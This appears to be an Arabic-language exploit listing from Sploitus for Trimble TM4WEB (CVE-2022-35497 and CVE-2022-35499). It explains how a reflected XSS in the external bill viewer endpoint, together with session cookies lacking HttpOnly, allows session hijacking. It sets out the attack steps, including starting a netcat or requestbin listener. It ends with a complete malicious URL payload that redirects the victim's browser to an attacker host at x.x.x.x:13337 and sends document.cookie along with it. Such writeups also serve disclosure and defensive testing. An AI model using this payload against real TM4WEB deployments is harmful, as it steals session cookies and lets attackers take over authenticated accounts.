Sploitus

Exploit for CVE-2022-35497 CVE-2022-35497 CVE-2022-35499

kitploit · 2026-08-31

Exploit Code

MARKDOWN16 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PN-TESTER-CVE-2022-35497
في إصدار TM4WEB <=22.2.0 من Trimble، وبسبب سوء الإعداد الأمني لمعرّفات الجلسة، من الممكن استرداد ملفات تعريف ارتباط الجلسة الصالحة عبر ثغرة البرمجة النصية العابرة للمواقع المنعكسة (reflected XSS) التي تؤثر على نقطة نهاية عارض المستندات الخارجي. على وجه التحديد، ملفات تعريف الارتباط الثلاثة المستخدمة للحفاظ على الجلسات هي `UID` و`rstring` و`PHPSESSIONID`، ولا يحتوي أي منها على علامة `HttpOnly` المناسبة لمنع استردادها عبر ناقلات تنفيذ JavaScript.

_الخطوة 1 :_

يستغل المهاجم ثغرة البرمجة النصية العابرة للمواقع المنعكسة CVE-2022-35499 للحصول على ملفات تعريف ارتباط جلسة الضحية المُصادَق عليها.

يبدأ المهاجم مستمعًا (listener) على منفذ عشوائي لخادم متصل بالإنترنت يمكنه استقبال طلبات HTTP. يمكن تحقيق ذلك باستخدام خدمة مثل requestbin، أو ببساطة عن طريق تشغيل مستمع netcat على منفذ عشوائي.

يستغل عنوان URL المثال ثغرة XSS المشار إليها CVE-2022-35499 لتنفيذ هجوم اختطاف جلسة على مستخدم مُصادَق عليه، ويرسل ملفات تعريف ارتباط جلسة الضحية إلى خادم يتحكم فيه المهاجم

(ممثلًا بالرمز `x.x.x.x` بدلًا من عنوان IP الخاص بنا في المثال) على المنفذ `13337`

_مثال لعنوان URL خبيث باستخدام موقع غير موجود:_

`https://example.tm4web.com/trace/external_bill_viewer.msw?foo=bar%22}%27);document.location=%27http://x.x.x.x:13337/foo.txt?c=%27%2bdocument.cookie;%3C!--`